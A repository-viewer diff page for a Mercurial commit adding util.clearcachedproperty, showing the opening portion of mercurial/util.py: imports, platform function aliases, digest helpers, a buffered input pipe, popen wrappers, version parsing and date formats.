##// END OF EJS Templates
util: add util.clearcachedproperty...
Mark Thomas -
r35021:be6aa0cf default
parent child Browse files
Show More
@@ -1,3861 +1,3866 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 empty = pycompat.empty
65 empty = pycompat.empty
66 httplib = pycompat.httplib
66 httplib = pycompat.httplib
67 pickle = pycompat.pickle
67 pickle = pycompat.pickle
68 queue = pycompat.queue
68 queue = pycompat.queue
69 socketserver = pycompat.socketserver
69 socketserver = pycompat.socketserver
70 stderr = pycompat.stderr
70 stderr = pycompat.stderr
71 stdin = pycompat.stdin
71 stdin = pycompat.stdin
72 stdout = pycompat.stdout
72 stdout = pycompat.stdout
73 stringio = pycompat.stringio
73 stringio = pycompat.stringio
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 httpserver = urllibcompat.httpserver
76 httpserver = urllibcompat.httpserver
77 urlerr = urllibcompat.urlerr
77 urlerr = urllibcompat.urlerr
78 urlreq = urllibcompat.urlreq
78 urlreq = urllibcompat.urlreq
79
79
80 # workaround for win32mbcs
80 # workaround for win32mbcs
81 _filenamebytestr = pycompat.bytestr
81 _filenamebytestr = pycompat.bytestr
82
82
83 def isatty(fp):
83 def isatty(fp):
84 try:
84 try:
85 return fp.isatty()
85 return fp.isatty()
86 except AttributeError:
86 except AttributeError:
87 return False
87 return False
88
88
89 # glibc determines buffering on first write to stdout - if we replace a TTY
89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # buffering
91 # buffering
92 if isatty(stdout):
92 if isatty(stdout):
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 stdout = platform.winstdout(stdout)
97 stdout = platform.winstdout(stdout)
98 else:
98 else:
99 from . import posix as platform
99 from . import posix as platform
100
100
101 _ = i18n._
101 _ = i18n._
102
102
103 bindunixsocket = platform.bindunixsocket
103 bindunixsocket = platform.bindunixsocket
104 cachestat = platform.cachestat
104 cachestat = platform.cachestat
105 checkexec = platform.checkexec
105 checkexec = platform.checkexec
106 checklink = platform.checklink
106 checklink = platform.checklink
107 copymode = platform.copymode
107 copymode = platform.copymode
108 executablepath = platform.executablepath
108 executablepath = platform.executablepath
109 expandglobs = platform.expandglobs
109 expandglobs = platform.expandglobs
110 explainexit = platform.explainexit
110 explainexit = platform.explainexit
111 findexe = platform.findexe
111 findexe = platform.findexe
112 gethgcmd = platform.gethgcmd
112 gethgcmd = platform.gethgcmd
113 getuser = platform.getuser
113 getuser = platform.getuser
114 getpid = os.getpid
114 getpid = os.getpid
115 groupmembers = platform.groupmembers
115 groupmembers = platform.groupmembers
116 groupname = platform.groupname
116 groupname = platform.groupname
117 hidewindow = platform.hidewindow
117 hidewindow = platform.hidewindow
118 isexec = platform.isexec
118 isexec = platform.isexec
119 isowner = platform.isowner
119 isowner = platform.isowner
120 listdir = osutil.listdir
120 listdir = osutil.listdir
121 localpath = platform.localpath
121 localpath = platform.localpath
122 lookupreg = platform.lookupreg
122 lookupreg = platform.lookupreg
123 makedir = platform.makedir
123 makedir = platform.makedir
124 nlinks = platform.nlinks
124 nlinks = platform.nlinks
125 normpath = platform.normpath
125 normpath = platform.normpath
126 normcase = platform.normcase
126 normcase = platform.normcase
127 normcasespec = platform.normcasespec
127 normcasespec = platform.normcasespec
128 normcasefallback = platform.normcasefallback
128 normcasefallback = platform.normcasefallback
129 openhardlinks = platform.openhardlinks
129 openhardlinks = platform.openhardlinks
130 oslink = platform.oslink
130 oslink = platform.oslink
131 parsepatchoutput = platform.parsepatchoutput
131 parsepatchoutput = platform.parsepatchoutput
132 pconvert = platform.pconvert
132 pconvert = platform.pconvert
133 poll = platform.poll
133 poll = platform.poll
134 popen = platform.popen
134 popen = platform.popen
135 posixfile = platform.posixfile
135 posixfile = platform.posixfile
136 quotecommand = platform.quotecommand
136 quotecommand = platform.quotecommand
137 readpipe = platform.readpipe
137 readpipe = platform.readpipe
138 rename = platform.rename
138 rename = platform.rename
139 removedirs = platform.removedirs
139 removedirs = platform.removedirs
140 samedevice = platform.samedevice
140 samedevice = platform.samedevice
141 samefile = platform.samefile
141 samefile = platform.samefile
142 samestat = platform.samestat
142 samestat = platform.samestat
143 setbinary = platform.setbinary
143 setbinary = platform.setbinary
144 setflags = platform.setflags
144 setflags = platform.setflags
145 setsignalhandler = platform.setsignalhandler
145 setsignalhandler = platform.setsignalhandler
146 shellquote = platform.shellquote
146 shellquote = platform.shellquote
147 spawndetached = platform.spawndetached
147 spawndetached = platform.spawndetached
148 split = platform.split
148 split = platform.split
149 sshargs = platform.sshargs
149 sshargs = platform.sshargs
150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 statisexec = platform.statisexec
151 statisexec = platform.statisexec
152 statislink = platform.statislink
152 statislink = platform.statislink
153 testpid = platform.testpid
153 testpid = platform.testpid
154 umask = platform.umask
154 umask = platform.umask
155 unlink = platform.unlink
155 unlink = platform.unlink
156 username = platform.username
156 username = platform.username
157
157
158 try:
158 try:
159 recvfds = osutil.recvfds
159 recvfds = osutil.recvfds
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162 try:
162 try:
163 setprocname = osutil.setprocname
163 setprocname = osutil.setprocname
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166
166
167 # Python compatibility
167 # Python compatibility
168
168
169 _notset = object()
169 _notset = object()
170
170
171 # disable Python's problematic floating point timestamps (issue4836)
171 # disable Python's problematic floating point timestamps (issue4836)
172 # (Python hypocritically says you shouldn't change this behavior in
172 # (Python hypocritically says you shouldn't change this behavior in
173 # libraries, and sure enough Mercurial is not a library.)
173 # libraries, and sure enough Mercurial is not a library.)
174 os.stat_float_times(False)
174 os.stat_float_times(False)
175
175
176 def safehasattr(thing, attr):
176 def safehasattr(thing, attr):
177 return getattr(thing, attr, _notset) is not _notset
177 return getattr(thing, attr, _notset) is not _notset
178
178
179 def bytesinput(fin, fout, *args, **kwargs):
179 def bytesinput(fin, fout, *args, **kwargs):
180 sin, sout = sys.stdin, sys.stdout
180 sin, sout = sys.stdin, sys.stdout
181 try:
181 try:
182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 finally:
184 finally:
185 sys.stdin, sys.stdout = sin, sout
185 sys.stdin, sys.stdout = sin, sout
186
186
187 def bitsfrom(container):
187 def bitsfrom(container):
188 bits = 0
188 bits = 0
189 for bit in container:
189 for bit in container:
190 bits |= bit
190 bits |= bit
191 return bits
191 return bits
192
192
193 # python 2.6 still have deprecation warning enabled by default. We do not want
193 # python 2.6 still have deprecation warning enabled by default. We do not want
194 # to display anything to standard user so detect if we are running test and
194 # to display anything to standard user so detect if we are running test and
195 # only use python deprecation warning in this case.
195 # only use python deprecation warning in this case.
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 if _dowarn:
197 if _dowarn:
198 # explicitly unfilter our warning for python 2.7
198 # explicitly unfilter our warning for python 2.7
199 #
199 #
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 " update your code.)") % version
215 " update your code.)") % version
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
217
218 DIGESTS = {
218 DIGESTS = {
219 'md5': hashlib.md5,
219 'md5': hashlib.md5,
220 'sha1': hashlib.sha1,
220 'sha1': hashlib.sha1,
221 'sha512': hashlib.sha512,
221 'sha512': hashlib.sha512,
222 }
222 }
223 # List of digest types from strongest to weakest
223 # List of digest types from strongest to weakest
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225
225
226 for k in DIGESTS_BY_STRENGTH:
226 for k in DIGESTS_BY_STRENGTH:
227 assert k in DIGESTS
227 assert k in DIGESTS
228
228
229 class digester(object):
229 class digester(object):
230 """helper to compute digests.
230 """helper to compute digests.
231
231
232 This helper can be used to compute one or more digests given their name.
232 This helper can be used to compute one or more digests given their name.
233
233
234 >>> d = digester([b'md5', b'sha1'])
234 >>> d = digester([b'md5', b'sha1'])
235 >>> d.update(b'foo')
235 >>> d.update(b'foo')
236 >>> [k for k in sorted(d)]
236 >>> [k for k in sorted(d)]
237 ['md5', 'sha1']
237 ['md5', 'sha1']
238 >>> d[b'md5']
238 >>> d[b'md5']
239 'acbd18db4cc2f85cedef654fccc4a4d8'
239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 >>> d[b'sha1']
240 >>> d[b'sha1']
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 >>> digester.preferred([b'md5', b'sha1'])
242 >>> digester.preferred([b'md5', b'sha1'])
243 'sha1'
243 'sha1'
244 """
244 """
245
245
246 def __init__(self, digests, s=''):
246 def __init__(self, digests, s=''):
247 self._hashes = {}
247 self._hashes = {}
248 for k in digests:
248 for k in digests:
249 if k not in DIGESTS:
249 if k not in DIGESTS:
250 raise Abort(_('unknown digest type: %s') % k)
250 raise Abort(_('unknown digest type: %s') % k)
251 self._hashes[k] = DIGESTS[k]()
251 self._hashes[k] = DIGESTS[k]()
252 if s:
252 if s:
253 self.update(s)
253 self.update(s)
254
254
255 def update(self, data):
255 def update(self, data):
256 for h in self._hashes.values():
256 for h in self._hashes.values():
257 h.update(data)
257 h.update(data)
258
258
259 def __getitem__(self, key):
259 def __getitem__(self, key):
260 if key not in DIGESTS:
260 if key not in DIGESTS:
261 raise Abort(_('unknown digest type: %s') % k)
261 raise Abort(_('unknown digest type: %s') % k)
262 return self._hashes[key].hexdigest()
262 return self._hashes[key].hexdigest()
263
263
264 def __iter__(self):
264 def __iter__(self):
265 return iter(self._hashes)
265 return iter(self._hashes)
266
266
267 @staticmethod
267 @staticmethod
268 def preferred(supported):
268 def preferred(supported):
269 """returns the strongest digest type in both supported and DIGESTS."""
269 """returns the strongest digest type in both supported and DIGESTS."""
270
270
271 for k in DIGESTS_BY_STRENGTH:
271 for k in DIGESTS_BY_STRENGTH:
272 if k in supported:
272 if k in supported:
273 return k
273 return k
274 return None
274 return None
275
275
276 class digestchecker(object):
276 class digestchecker(object):
277 """file handle wrapper that additionally checks content against a given
277 """file handle wrapper that additionally checks content against a given
278 size and digests.
278 size and digests.
279
279
280 d = digestchecker(fh, size, {'md5': '...'})
280 d = digestchecker(fh, size, {'md5': '...'})
281
281
282 When multiple digests are given, all of them are validated.
282 When multiple digests are given, all of them are validated.
283 """
283 """
284
284
285 def __init__(self, fh, size, digests):
285 def __init__(self, fh, size, digests):
286 self._fh = fh
286 self._fh = fh
287 self._size = size
287 self._size = size
288 self._got = 0
288 self._got = 0
289 self._digests = dict(digests)
289 self._digests = dict(digests)
290 self._digester = digester(self._digests.keys())
290 self._digester = digester(self._digests.keys())
291
291
292 def read(self, length=-1):
292 def read(self, length=-1):
293 content = self._fh.read(length)
293 content = self._fh.read(length)
294 self._digester.update(content)
294 self._digester.update(content)
295 self._got += len(content)
295 self._got += len(content)
296 return content
296 return content
297
297
298 def validate(self):
298 def validate(self):
299 if self._size != self._got:
299 if self._size != self._got:
300 raise Abort(_('size mismatch: expected %d, got %d') %
300 raise Abort(_('size mismatch: expected %d, got %d') %
301 (self._size, self._got))
301 (self._size, self._got))
302 for k, v in self._digests.items():
302 for k, v in self._digests.items():
303 if v != self._digester[k]:
303 if v != self._digester[k]:
304 # i18n: first parameter is a digest name
304 # i18n: first parameter is a digest name
305 raise Abort(_('%s mismatch: expected %s, got %s') %
305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 (k, v, self._digester[k]))
306 (k, v, self._digester[k]))
307
307
308 try:
308 try:
309 buffer = buffer
309 buffer = buffer
310 except NameError:
310 except NameError:
311 def buffer(sliceable, offset=0, length=None):
311 def buffer(sliceable, offset=0, length=None):
312 if length is not None:
312 if length is not None:
313 return memoryview(sliceable)[offset:offset + length]
313 return memoryview(sliceable)[offset:offset + length]
314 return memoryview(sliceable)[offset:]
314 return memoryview(sliceable)[offset:]
315
315
316 closefds = pycompat.isposix
316 closefds = pycompat.isposix
317
317
318 _chunksize = 4096
318 _chunksize = 4096
319
319
320 class bufferedinputpipe(object):
320 class bufferedinputpipe(object):
321 """a manually buffered input pipe
321 """a manually buffered input pipe
322
322
323 Python will not let us use buffered IO and lazy reading with 'polling' at
323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 the same time. We cannot probe the buffer state and select will not detect
324 the same time. We cannot probe the buffer state and select will not detect
325 that data are ready to read if they are already buffered.
325 that data are ready to read if they are already buffered.
326
326
327 This class let us work around that by implementing its own buffering
327 This class let us work around that by implementing its own buffering
328 (allowing efficient readline) while offering a way to know if the buffer is
328 (allowing efficient readline) while offering a way to know if the buffer is
329 empty from the output (allowing collaboration of the buffer with polling).
329 empty from the output (allowing collaboration of the buffer with polling).
330
330
331 This class lives in the 'util' module because it makes use of the 'os'
331 This class lives in the 'util' module because it makes use of the 'os'
332 module from the python stdlib.
332 module from the python stdlib.
333 """
333 """
334
334
335 def __init__(self, input):
335 def __init__(self, input):
336 self._input = input
336 self._input = input
337 self._buffer = []
337 self._buffer = []
338 self._eof = False
338 self._eof = False
339 self._lenbuf = 0
339 self._lenbuf = 0
340
340
341 @property
341 @property
342 def hasbuffer(self):
342 def hasbuffer(self):
343 """True is any data is currently buffered
343 """True is any data is currently buffered
344
344
345 This will be used externally a pre-step for polling IO. If there is
345 This will be used externally a pre-step for polling IO. If there is
346 already data then no polling should be set in place."""
346 already data then no polling should be set in place."""
347 return bool(self._buffer)
347 return bool(self._buffer)
348
348
349 @property
349 @property
350 def closed(self):
350 def closed(self):
351 return self._input.closed
351 return self._input.closed
352
352
353 def fileno(self):
353 def fileno(self):
354 return self._input.fileno()
354 return self._input.fileno()
355
355
356 def close(self):
356 def close(self):
357 return self._input.close()
357 return self._input.close()
358
358
359 def read(self, size):
359 def read(self, size):
360 while (not self._eof) and (self._lenbuf < size):
360 while (not self._eof) and (self._lenbuf < size):
361 self._fillbuffer()
361 self._fillbuffer()
362 return self._frombuffer(size)
362 return self._frombuffer(size)
363
363
364 def readline(self, *args, **kwargs):
364 def readline(self, *args, **kwargs):
365 if 1 < len(self._buffer):
365 if 1 < len(self._buffer):
366 # this should not happen because both read and readline end with a
366 # this should not happen because both read and readline end with a
367 # _frombuffer call that collapse it.
367 # _frombuffer call that collapse it.
368 self._buffer = [''.join(self._buffer)]
368 self._buffer = [''.join(self._buffer)]
369 self._lenbuf = len(self._buffer[0])
369 self._lenbuf = len(self._buffer[0])
370 lfi = -1
370 lfi = -1
371 if self._buffer:
371 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
373 while (not self._eof) and lfi < 0:
373 while (not self._eof) and lfi < 0:
374 self._fillbuffer()
374 self._fillbuffer()
375 if self._buffer:
375 if self._buffer:
376 lfi = self._buffer[-1].find('\n')
376 lfi = self._buffer[-1].find('\n')
377 size = lfi + 1
377 size = lfi + 1
378 if lfi < 0: # end of file
378 if lfi < 0: # end of file
379 size = self._lenbuf
379 size = self._lenbuf
380 elif 1 < len(self._buffer):
380 elif 1 < len(self._buffer):
381 # we need to take previous chunks into account
381 # we need to take previous chunks into account
382 size += self._lenbuf - len(self._buffer[-1])
382 size += self._lenbuf - len(self._buffer[-1])
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def _frombuffer(self, size):
385 def _frombuffer(self, size):
386 """return at most 'size' data from the buffer
386 """return at most 'size' data from the buffer
387
387
388 The data are removed from the buffer."""
388 The data are removed from the buffer."""
389 if size == 0 or not self._buffer:
389 if size == 0 or not self._buffer:
390 return ''
390 return ''
391 buf = self._buffer[0]
391 buf = self._buffer[0]
392 if 1 < len(self._buffer):
392 if 1 < len(self._buffer):
393 buf = ''.join(self._buffer)
393 buf = ''.join(self._buffer)
394
394
395 data = buf[:size]
395 data = buf[:size]
396 buf = buf[len(data):]
396 buf = buf[len(data):]
397 if buf:
397 if buf:
398 self._buffer = [buf]
398 self._buffer = [buf]
399 self._lenbuf = len(buf)
399 self._lenbuf = len(buf)
400 else:
400 else:
401 self._buffer = []
401 self._buffer = []
402 self._lenbuf = 0
402 self._lenbuf = 0
403 return data
403 return data
404
404
405 def _fillbuffer(self):
405 def _fillbuffer(self):
406 """read data to the buffer"""
406 """read data to the buffer"""
407 data = os.read(self._input.fileno(), _chunksize)
407 data = os.read(self._input.fileno(), _chunksize)
408 if not data:
408 if not data:
409 self._eof = True
409 self._eof = True
410 else:
410 else:
411 self._lenbuf += len(data)
411 self._lenbuf += len(data)
412 self._buffer.append(data)
412 self._buffer.append(data)
413
413
414 def mmapread(fp):
414 def mmapread(fp):
415 try:
415 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
416 fd = getattr(fp, 'fileno', lambda: fp)()
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
418 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
420 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
421 if os.fstat(fd).st_size == 0:
422 return ''
422 return ''
423 raise
423 raise
424
424
425 def popen2(cmd, env=None, newlines=False):
425 def popen2(cmd, env=None, newlines=False):
426 # Setting bufsize to -1 lets the system decide the buffer size.
426 # Setting bufsize to -1 lets the system decide the buffer size.
427 # The default for bufsize is 0, meaning unbuffered. This leads to
427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 close_fds=closefds,
430 close_fds=closefds,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 universal_newlines=newlines,
432 universal_newlines=newlines,
433 env=env)
433 env=env)
434 return p.stdin, p.stdout
434 return p.stdin, p.stdout
435
435
436 def popen3(cmd, env=None, newlines=False):
436 def popen3(cmd, env=None, newlines=False):
437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 return stdin, stdout, stderr
438 return stdin, stdout, stderr
439
439
440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 close_fds=closefds,
442 close_fds=closefds,
443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 stderr=subprocess.PIPE,
444 stderr=subprocess.PIPE,
445 universal_newlines=newlines,
445 universal_newlines=newlines,
446 env=env)
446 env=env)
447 return p.stdin, p.stdout, p.stderr, p
447 return p.stdin, p.stdout, p.stderr, p
448
448
449 def version():
449 def version():
450 """Return version information if available."""
450 """Return version information if available."""
451 try:
451 try:
452 from . import __version__
452 from . import __version__
453 return __version__.version
453 return __version__.version
454 except ImportError:
454 except ImportError:
455 return 'unknown'
455 return 'unknown'
456
456
457 def versiontuple(v=None, n=4):
457 def versiontuple(v=None, n=4):
458 """Parses a Mercurial version string into an N-tuple.
458 """Parses a Mercurial version string into an N-tuple.
459
459
460 The version string to be parsed is specified with the ``v`` argument.
460 The version string to be parsed is specified with the ``v`` argument.
461 If it isn't defined, the current Mercurial version string will be parsed.
461 If it isn't defined, the current Mercurial version string will be parsed.
462
462
463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 returned values:
464 returned values:
465
465
466 >>> v = b'3.6.1+190-df9b73d2d444'
466 >>> v = b'3.6.1+190-df9b73d2d444'
467 >>> versiontuple(v, 2)
467 >>> versiontuple(v, 2)
468 (3, 6)
468 (3, 6)
469 >>> versiontuple(v, 3)
469 >>> versiontuple(v, 3)
470 (3, 6, 1)
470 (3, 6, 1)
471 >>> versiontuple(v, 4)
471 >>> versiontuple(v, 4)
472 (3, 6, 1, '190-df9b73d2d444')
472 (3, 6, 1, '190-df9b73d2d444')
473
473
474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 (3, 6, 1, '190-df9b73d2d444+20151118')
475 (3, 6, 1, '190-df9b73d2d444+20151118')
476
476
477 >>> v = b'3.6'
477 >>> v = b'3.6'
478 >>> versiontuple(v, 2)
478 >>> versiontuple(v, 2)
479 (3, 6)
479 (3, 6)
480 >>> versiontuple(v, 3)
480 >>> versiontuple(v, 3)
481 (3, 6, None)
481 (3, 6, None)
482 >>> versiontuple(v, 4)
482 >>> versiontuple(v, 4)
483 (3, 6, None, None)
483 (3, 6, None, None)
484
484
485 >>> v = b'3.9-rc'
485 >>> v = b'3.9-rc'
486 >>> versiontuple(v, 2)
486 >>> versiontuple(v, 2)
487 (3, 9)
487 (3, 9)
488 >>> versiontuple(v, 3)
488 >>> versiontuple(v, 3)
489 (3, 9, None)
489 (3, 9, None)
490 >>> versiontuple(v, 4)
490 >>> versiontuple(v, 4)
491 (3, 9, None, 'rc')
491 (3, 9, None, 'rc')
492
492
493 >>> v = b'3.9-rc+2-02a8fea4289b'
493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 >>> versiontuple(v, 2)
494 >>> versiontuple(v, 2)
495 (3, 9)
495 (3, 9)
496 >>> versiontuple(v, 3)
496 >>> versiontuple(v, 3)
497 (3, 9, None)
497 (3, 9, None)
498 >>> versiontuple(v, 4)
498 >>> versiontuple(v, 4)
499 (3, 9, None, 'rc+2-02a8fea4289b')
499 (3, 9, None, 'rc+2-02a8fea4289b')
500 """
500 """
501 if not v:
501 if not v:
502 v = version()
502 v = version()
503 parts = remod.split('[\+-]', v, 1)
503 parts = remod.split('[\+-]', v, 1)
504 if len(parts) == 1:
504 if len(parts) == 1:
505 vparts, extra = parts[0], None
505 vparts, extra = parts[0], None
506 else:
506 else:
507 vparts, extra = parts
507 vparts, extra = parts
508
508
509 vints = []
509 vints = []
510 for i in vparts.split('.'):
510 for i in vparts.split('.'):
511 try:
511 try:
512 vints.append(int(i))
512 vints.append(int(i))
513 except ValueError:
513 except ValueError:
514 break
514 break
515 # (3, 6) -> (3, 6, None)
515 # (3, 6) -> (3, 6, None)
516 while len(vints) < 3:
516 while len(vints) < 3:
517 vints.append(None)
517 vints.append(None)
518
518
519 if n == 2:
519 if n == 2:
520 return (vints[0], vints[1])
520 return (vints[0], vints[1])
521 if n == 3:
521 if n == 3:
522 return (vints[0], vints[1], vints[2])
522 return (vints[0], vints[1], vints[2])
523 if n == 4:
523 if n == 4:
524 return (vints[0], vints[1], vints[2], extra)
524 return (vints[0], vints[1], vints[2], extra)
525
525
526 # used by parsedate
526 # used by parsedate
527 defaultdateformats = (
527 defaultdateformats = (
528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 '%Y-%m-%dT%H:%M', # without seconds
529 '%Y-%m-%dT%H:%M', # without seconds
530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 '%Y-%m-%dT%H%M', # without seconds
531 '%Y-%m-%dT%H%M', # without seconds
532 '%Y-%m-%d %H:%M:%S', # our common legal variant
532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 '%Y-%m-%d %H:%M', # without seconds
533 '%Y-%m-%d %H:%M', # without seconds
534 '%Y-%m-%d %H%M%S', # without :
534 '%Y-%m-%d %H%M%S', # without :
535 '%Y-%m-%d %H%M', # without seconds
535 '%Y-%m-%d %H%M', # without seconds
536 '%Y-%m-%d %I:%M:%S%p',
536 '%Y-%m-%d %I:%M:%S%p',
537 '%Y-%m-%d %H:%M',
537 '%Y-%m-%d %H:%M',
538 '%Y-%m-%d %I:%M%p',
538 '%Y-%m-%d %I:%M%p',
539 '%Y-%m-%d',
539 '%Y-%m-%d',
540 '%m-%d',
540 '%m-%d',
541 '%m/%d',
541 '%m/%d',
542 '%m/%d/%y',
542 '%m/%d/%y',
543 '%m/%d/%Y',
543 '%m/%d/%Y',
544 '%a %b %d %H:%M:%S %Y',
544 '%a %b %d %H:%M:%S %Y',
545 '%a %b %d %I:%M:%S%p %Y',
545 '%a %b %d %I:%M:%S%p %Y',
546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 '%b %d %H:%M:%S %Y',
547 '%b %d %H:%M:%S %Y',
548 '%b %d %I:%M:%S%p %Y',
548 '%b %d %I:%M:%S%p %Y',
549 '%b %d %H:%M:%S',
549 '%b %d %H:%M:%S',
550 '%b %d %I:%M:%S%p',
550 '%b %d %I:%M:%S%p',
551 '%b %d %H:%M',
551 '%b %d %H:%M',
552 '%b %d %I:%M%p',
